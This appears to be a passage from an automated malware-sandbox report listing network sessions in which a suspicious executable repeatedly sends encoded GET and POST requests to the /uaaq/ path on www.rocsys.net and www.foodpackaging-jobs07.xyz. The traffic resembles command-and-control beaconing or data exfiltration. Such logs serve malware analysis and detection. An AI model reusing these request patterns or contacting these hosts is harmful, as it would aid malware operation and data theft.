31 67 6a 53 2b 4f 39 51 76 31 4b 70 62 6d 33 36 35 44 4e 49 6e 75 4c 38 4e 70 4c 30 74 78 30 66 47 61 33 35 73 71 75 6c 54 70 66 65 6b 47 58 66 4f 69 62 43 57 6d 75 47 6a 67 71 38 4c 56 30 71 6c 6c 51 55 7a 57 70 59 42 67 72 70 4a 4e 39 57 31 4e 47 47 59 68 42 38 30 38 4a 2f 74 64 37 2f 4a 58 32 39 4d 68 44 70 43 4c 6f 53 69 58 62 47 6b 67 72 36 47 5a 62 48 38 78 55 58 71 43 37 49 6f 71 52 78 6b 72 64 37 64 4e 47 4a 47
                                                                                    Data Ascii: 9pG0L=Tff68lvQbh9/7X8CaLn/7o9qZacYbqu5wfYz5bEKn2JQwrgXKdj7tPYI5rVm1/R2Yl+4Ni0xsn5upyE7ApHm8dgW9owDLZpXm7gPVdP47BG0ToRclxXRem0RW42KQHsJ5h8E1Svbc9fH8hhI4hTVoZ9fB3FTxgOKPQ2qOlNfJulyCw3ziMiMJd5LS1aI7ak/yRZdACa0G11FIQHIj1Bvy6DCB2kKocikJfq6S5sZnfdanlPgGRNT4zEFPWVgTRm7u/TLPLy5FJp9SfrdTQfNeK1MjlaYNvDtd4AWseQngXbTml3XOOcqCvbP1SbQbkrwrpV1teCen36ZekNVztZyPM2l9zzBASiXOAaWBnJ7AxZWQW4M0rqIBV4X3DSzmL9cotRAUDhv6zWr3E6CVTYJKvdxUMToQ4PQ9RmhuYEzmQ0cgkF3+dzcdGZglIi20wEADjsQdJ+NYuGMr22sI6iPGAmhixBejwAIG1Mn3CuktBA9dZJFfD28l84+tUWur55x5IdjqwNzBNw7j8SeumwRVLhsvW2/wG3LQdYUI7rfrUjueCvmJnVy83WTisrCMPlYm1bDDLw/+UmRzcODdNXjbr0ZTBu1Q/GJtm5EM74lVRZWV1YMcqah2H3H70DVBCR45kaZkSkohGjtl9HjMyA6DcUJRuryyjxTUSa1sGDWEZBeAJUTU1RJB6h+Yt4MELBTlSNf1bShn7XtR0RGq8jfNvvRcRGMan5HpJpjPOveBVWdYJag0YApFAU+fc1GUVLJzAMJR/rtdrHXgSIkdhy8l/LoddoqTW0qFXf238KpItN9T9rzHQMfV5B3avyI8BI9dwnHY7QOyV+nBOWASgBvCulnzBdLs4CP9KKtIKo0t0/sKGp/XidSIeRMFEODi9WrzFCcNsQolasV5N9Ilo49RfLe0+WL6ylh7FweQ5EeFDV/6TUyF1vITgKPhJc7k232+Zm1B4A/8Q+0s+A1gjS+O9Qv1Kpbm365DNInuL8NpL0tx0fGa35squlTpfekGXfOibCWmuGjgq8LV0qllQUzWpYBgrpJN9W1NGGYhB808J/td7/JX29MhDpCLoSiXbGkgr6GZbH8xUXqC7IoqRxkrd7dNGJG
                                                                                    Dec 4, 2023 12:03:58.312223911 CET755INHTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:03:58 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.11.304975764.190.62.22803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:04:00.825848103 CET436OUTGET /uaaq/?9pG0L=ed3a/Sv+YSNt0BMMWtDh8oRuTPUbBqji39M76aoz6xorlqt/FJu/vPF07bZH/KR6fDXWAwgG8DEezwMWX4bfyuM0xYlQJ9cJ0w==&XFs82=6R5Xx6907 HTTP/1.1
                                                                                    Host: www.foodpackaging-jobs07.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:04:01.012149096 CET161INHTTP/1.1 436
                                                                                    date: Mon, 04 Dec 2023 11:04:00 GMT
                                                                                    content-length: 0
                                                                                    server: NginX
                                                                                    connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.11.304975837.97.254.27803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:04:06.581212997 CET686OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.rocsys.net
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.rocsys.net
                                                                                    Referer: http://www.rocsys.net/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 55 74 49 4e 49 45 37 52 78 4a 34 2f 30 68 45 73 46 37 4a 31 50 62 55 6b 61 4a 37 63 78 57 4b 54 46 49 49 6a 47 79 67 32 57 70 7a 2f 57 48 64 6c 75 4b 6a 42 48 2b 39 73 38 63 6e 5a 7a 33 71 4a 52 75 30 33 44 6d 45 37 2b 63 72 4a 58 57 53 6b 51 75 67 2f 6c 31 70 61 7a 5a 74 48 54 2b 44 63 63 34 2f 56 7a 49 35 2b 52 33 53 48 54 44 31 71 38 64 58 64 76 78 4c 44 6f 6b 70 71 2f 4b 6f 4d 2f 39 58 66 68 65 42 4a 39 46 69 4d 4d 78 32 56 30 6b 6f 6b 42 53 44 59 6a 79 74 67 46 59 42 7a 32 6e 6d 2f 4e 52 36 70 6a 50 65 32 6d 6a 61 35 77 51 3d 3d
                                                                                    Data Ascii: 9pG0L=UtINIE7RxJ4/0hEsF7J1PbUkaJ7cxWKTFIIjGyg2Wpz/WHdluKjBH+9s8cnZz3qJRu03DmE7+crJXWSkQug/l1pazZtHT+Dcc4/VzI5+R3SHTD1q8dXdvxLDokpq/KoM/9XfheBJ9FiMMx2V0kokBSDYjytgFYBz2nm/NR6pjPe2mja5wQ==
                                                                                    Dec 4, 2023 12:04:06.759267092 CET242INHTTP/1.0 403 Forbidden
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.11.304975937.97.254.27803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:04:09.281474113 CET706OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.rocsys.net
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.rocsys.net
                                                                                    Referer: http://www.rocsys.net/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 55 74 49 4e 49 45 37 52 78 4a 34 2f 31 42 55 73 57 71 4a 31 48 62 55 6e 47 35 37 63 2b 32 4b 58 46 49 4d 6a 47 7a 31 37 57 62 6e 2f 57 6e 4e 6c 76 49 62 42 47 2b 39 73 30 38 6e 63 33 33 71 53 52 75 35 4b 44 6a 45 37 2b 63 2f 4a 58 58 69 6b 52 63 49 38 6b 6c 70 59 38 35 74 2f 4d 75 44 63 63 34 2f 56 7a 4d 51 70 52 33 61 48 54 32 39 71 2b 2f 76 65 69 52 4c 4d 2f 55 70 71 75 36 6f 41 2f 39 58 48 68 66 63 53 39 47 61 4d 4d 77 47 56 30 31 6f 6a 50 53 44 61 2b 69 73 78 4b 6f 42 35 38 46 72 6c 4a 44 2b 2f 36 4d 4c 36 71 57 32 71 33 6a 72 68 56 71 49 41 68 74 50 6e 4c 37 53 51 59 4a 4a 4c 6a 44 4d 3d
                                                                                    Data Ascii: 9pG0L=UtINIE7RxJ4/1BUsWqJ1HbUnG57c+2KXFIMjGz17Wbn/WnNlvIbBG+9s08nc33qSRu5KDjE7+c/JXXikRcI8klpY85t/MuDcc4/VzMQpR3aHT29q+/veiRLM/Upqu6oA/9XHhfcS9GaMMwGV01ojPSDa+isxKoB58FrlJD+/6ML6qW2q3jrhVqIAhtPnL7SQYJJLjDM=
                                                                                    Dec 4, 2023 12:04:09.451107979 CET242INHTTP/1.0 403 Forbidden
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.11.304976037.97.254.27803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:04:11.985013962 CET1623OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.rocsys.net
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.rocsys.net
                                                                                    Referer: http://www.rocsys.net/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 55 74 49 4e 49 45 37 52 78 4a 34 2f 31 42 55 73 57 71 4a 31 48 62 55 6e 47 35 37 63 2b 32 4b 58 46 49 4d 6a 47 7a 31 37 57 62 2f 2f 57 55 31 6c 74 70 62 42 46 2b 39 73 36 63 6e 64 33 33 72 49 52 75 68 47 44 6a 42 5a 2b 59 50 4a 57 78 32 6b 41 59 63 38 74 6c 70 59 6b 4a 74 45 54 2b 44 46 63 34 76 76 7a 49 38 70 52 33 61 48 54 78 4e 71 35 74 58 65 67 52 4c 44 6f 6b 6f 72 2f 4b 70 58 2f 38 2f 58 68 66 5a 6e 39 32 36 4d 4d 51 57 56 32 48 51 6a 48 53 44 55 39 69 73 70 4b 6f 4d 6a 38 46 6d 55 4a 44 6d 5a 36 50 62 36 6e 42 47 31 6b 68 62 59 50 38 51 52 75 39 48 4d 4b 2b 75 74 42 4d 4e 50 30 6e 71 33 50 64 49 7a 73 39 47 2f 75 6b 74 79 75 6f 7a 57 51 47 49 68 69 47 6c 7a 41 67 32 66 41 61 71 58 49 6d 66 2f 61 35 57 61 72 68 2f 43 4a 52 4f 6a 31 42 4f 71 50 75 41 46 59 43 74 68 36 47 61 34 56 74 64 77 78 4d 6e 37 42 50 50 2b 54 58 4d 71 63 4e 37 43 56 5a 4f 5a 47 44 6b 74 7a 41 4b 30 53 4f 59 71 49 42 4e 77 71 5a 45 68 41 44 4e 46 4f 48 47 31 46 34 52 72 6e 37 61 6f 4f 79 6f 2f 76 50 2b 45 43 6c 6b 78 55 50 62 44 68 33 57 68 44 49 38 6e 54 79 4b 50 2f 68 78 78 43 50 68 75 6b 50 56 30 70 79 61 58 70 52 6b 6d 59 6c 33 39 49 70 6a 30 4a 79 52 6e 76 49 2f 35 46 34 58 5a 68 35 44 78 44 47 65 56 65 2f 59 42 62 32 72 69 37 6f 5a 38 6c 2f 57 43 74 68 35 2b 2f 59 66 4f 46 59 71 63 55 58 64 44 6d 6f 2b 55 4c 71 69 73 30 7a 56 61 63 76 31 69 7a 6c 46 65 31 30 4e 4a 57 67 62 7a 4d 51 49 6a 33 77 61 6f 51 37 66 6c 36 74 4d 51 4f 62 55 6d 46 30 78 5a 70 45 74 6a 6f 6e 78 53 76 6d 64 34 56 75 66 64 6b 50 33 72 32 34 61 44 54 58 58 2f 65 6f 6f 64 4a 42 77 64 42 38 73 4c 6e 4a 73 42 6b 5a 34 36 36 61 49 63 6e 59 30 42 4d 32 6f 37 37 39 4a 53 71 52 39 4f 4c 61 61 69 71 45 5a 76 79 74 74 4b 4d 6d 6c 37 49 74 41 37 4a 6f 41 48 49 7a 6b 56 77 48 35 78 6e 73 2b 77 49 4b 58 39 42 35 41 36 54 70 41 39 66 44 51 41 55 2b 37 46 59 36 75 73 79 75 58 74 45 66 6e 64 58 4c 46 6d 6e 41 42 4d 67 55 53 69 72 68 66 64 44 35 52 79 62 57 2b 68 63 49 63 75 65 38 79 49 72 5a 74 4a 6b 32 78 56 77 4d 52 6d 2b 43 4c 77 47 48 2b 42 63 5a 4c 70 67 6e 76 61 35 4e 73 37 72 62 4d 54 6f 47 77 5a 41 46 72 36 30 57 6b 37 2b 34 77 67 43 46 66 7a 59 37 49 45 39 31 30 65 50 71 44 44 44 36 73 6b 55 4d 53 6f 61 79 45 66 57 32 68 54 58 72 6c 39 71 49 76 56 61 31 37 49 59 4b 6b 73 52 4c 45 6c 30 36 48 52 38 44 6a 44 46 74 75 76 35 76 42 63 66 33 44 58 36 77 6b 69 66 52 57 49 31 64 30 74 65 2f 2f 2f 72 41 58 37 78 67 54 7a 6c 56 47 2f 39 4c 6e 43 36 50 2f 4c 58 50 7a 6c 50 53 31 41 44 56 2b 57 4b 58 68 48 65 57 72 4d 63 46 42 57 76 6c 65 62 2f 63 6d 76 66 51 53 6f 57 43 58 65 44 4d 4e 5a 74 46 75 39 71 37 79 38 47 4a 71 54 4e 4c 79 69 78 33 6b 64 59 41 47 38 5a 7a 77 39 47 43 39 49 4b 2f 74 51 43 6a 48 51 77 73 34 52 37 68 52 59 4c 77 78 74 6f 52 78 67 53 6a 4e 58 2b 32 30 4e 64 4a 58 35 4a 6d 53 30 2b 7a 51 58 6b 65 4f 54 54 6a 76 77 34 79 42 68 46 54 75 52 2b 69 57 67 71 45 61 4b 65 62 58 46 2f 50 48 6d 44 59 64 53 68 4d 61 2b 62 4f 2b 2f 48 71 48 6d 42 71 6b 65 66 37 39 58 45 67 57 41 2b 33 45 38 48 38 74 4b 2b 52 54 65 74 75 34 4c 6e 44 4f 4b 56 57 34 72 70 51 39 33 67 45 4e 64 2b 39 6c 56 67 7a 68 73 43 38 65 51 37 71 69 6b 55 53 69 6a 79 6e 74 31 79 74 76 77 30 73 75 4e 62 4d 77 4f 4e 43 49 44 55 4d 70 61 6f 52 4e 75 67 6c 66 32 4f 56 77 78 4d 4f 32 74 41 4a 6e 5a 63 7a 65 32 79 6c 69 57 7a 37 71 4e 66 74 78 65 54 6a 76 36 36 43 38 4a 39 4b 2b 45
                                                                                    Data Ascii: 9pG0L=UtINIE7RxJ4/1BUsWqJ1HbUnG57c+2KXFIMjGz17Wb//WU1ltpbBF+9s6cnd33rIRuhGDjBZ+YPJWx2kAYc8tlpYkJtET+DFc4vvzI8pR3aHTxNq5tXegRLDokor/KpX/8/XhfZn926MMQWV2HQjHSDU9ispKoMj8FmUJDmZ6Pb6nBG1khbYP8QRu9HMK+utBMNP0nq3PdIzs9G/uktyuozWQGIhiGlzAg2fAaqXImf/a5Warh/CJROj1BOqPuAFYCth6Ga4VtdwxMn7BPP+TXMqcN7CVZOZGDktzAK0SOYqIBNwqZEhADNFOHG1F4Rrn7aoOyo/vP+EClkxUPbDh3WhDI8nTyKP/hxxCPhukPV0pyaXpRkmYl39Ipj0JyRnvI/5F4XZh5DxDGeVe/YBb2ri7oZ8l/WCth5+/YfOFYqcUXdDmo+ULqis0zVacv1izlFe10NJWgbzMQIj3waoQ7fl6tMQObUmF0xZpEtjonxSvmd4VufdkP3r24aDTXX/eoodJBwdB8sLnJsBkZ466aIcnY0BM2o779JSqR9OLaaiqEZvyttKMml7ItA7JoAHIzkVwH5xns+wIKX9B5A6TpA9fDQAU+7FY6usyuXtEfndXLFmnABMgUSirhfdD5RybW+hcIcue8yIrZtJk2xVwMRm+CLwGH+BcZLpgnva5Ns7rbMToGwZAFr60Wk7+4wgCFfzY7IE910ePqDDD6skUMSoayEfW2hTXrl9qIvVa17IYKksRLEl06HR8DjDFtuv5vBcf3DX6wkifRWI1d0te///rAX7xgTzlVG/9LnC6P/LXPzlPS1ADV+WKXhHeWrMcFBWvleb/cmvfQSoWCXeDMNZtFu9q7y8GJqTNLyix3kdYAG8Zzw9GC9IK/tQCjHQws4R7hRYLwxtoRxgSjNX+20NdJX5JmS0+zQXkeOTTjvw4yBhFTuR+iWgqEaKebXF/PHmDYdShMa+bO+/HqHmBqkef79XEgWA+3E8H8tK+RTetu4LnDOKVW4rpQ93gENd+9lVgzhsC8eQ7qikUSijynt1ytvw0suNbMwONCIDUMpaoRNuglf2OVwxMO2tAJnZcze2yliWz7qNftxeTjv66C8J9K+E
                                                                                    Dec 4, 2023 12:04:12.155654907 CET242INHTTP/1.0 403 Forbidden
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    8192.168.11.304976137.97.254.27803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:04:14.687134027 CET422OUTGET /uaaq/?XFs82=6R5Xx6907&9pG0L=ZvgtLzuC5J0fwHYuRehKE7pqe+TegS3vAv4ZEylVZ8S9BUo4tJK/O+Yy7erX60uFZvklPnpu2szjI2ePXJ09nWZe2eIrY7ioDA== HTTP/1.1
                                                                                    Host: www.rocsys.net
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:04:14.860176086 CET1340INHTTP/1.1 200 OK
                                                                                    Date: Fri, 28 Apr 2023 12:26:41 GMT
                                                                                    Server: Apache
                                                                                    Last-Modified: Thu, 04 Nov 2021 09:16:05 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Content-Type: text/html
                                                                                    Cache-Control: max-age=31536000
                                                                                    X-Varnish: 1066511555 3
                                                                                    Age: 19003053
                                                                                    Via: 1.1 varnish (Varnish/6.1)
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 64668
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 61 73 63 69 69 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 72 61 6e 73 49 50 20 2d 20 52 65 73 65 72 76 65 64 20 64 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 61 6e 73 49 50 20 2d 20 52 65 73 65 72 76 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 72 65 73 65 72 76 65 64 2e 74 72 61 6e 73 69 70 2e 6e 6c 2f 61 73 73 65 74 73 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 53 6f 75 72 63 65 2b 53 61 6e 73 2b 50 72 6f 3a 34 30 30 2c 39 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 2f 72 65 73 65 72 76 65 64 2e 74 72 61 6e 73 69 70 2e 6e 6c 2f 61 73 73 65 74 73 2f 63 73 73 2f 63 6f 6d 62 69 6e 65 64 2d 6d 69 6e 2e 63 73 73 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 42 65 7a 65 74 21 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 63 6c 61 73 73 3d 22 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 36 20 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 6c 65 66 74 20 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 62 72 61 6e 64 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: <!DOCTYPE html><html> <head lang="en"> <meta charset="ascii"> <title>TransIP - Reserved domain</title> <meta name="description" content="TransIP - Reserved domain"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <link rel="shortcut icon" href="//reserved.transip.nl/assets/img/favicon.ico" type="image/x-icon" /> <link href='https://fonts.googleapis.com/css?family=Source+Sans+Pro:400,900' rel='stylesheet' type='text/css'> <link rel="stylesheet" href="//reserved.transip.nl/assets/css/combined-min.css"> <title>Bezet!</title> </head> <body> <div class="container"> <div role="navigation" class="reserved-nav-container"> <div class="col-xs-6 reserved-nav-left reserved-nav-brand">
                                                                                    Dec 4, 2023 12:04:14.860222101 CET1340INData Raw: 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 72 61 6e 73 69 70 2e 6e 6c 2f 22 20 63 6c 61 73 73 3d 22 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 62 72 61 6e 64 2d 6c 69 6e 6b 20 6c 61 6e 67 5f 6e 6c 22 20 72 65 6c
                                                                                    Data Ascii: <a href="https://transip.nl/" class="reserved-nav-brand-link lang_nl" rel="nofollow"> <svg version="1.1" id="transip-logo" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xml:space
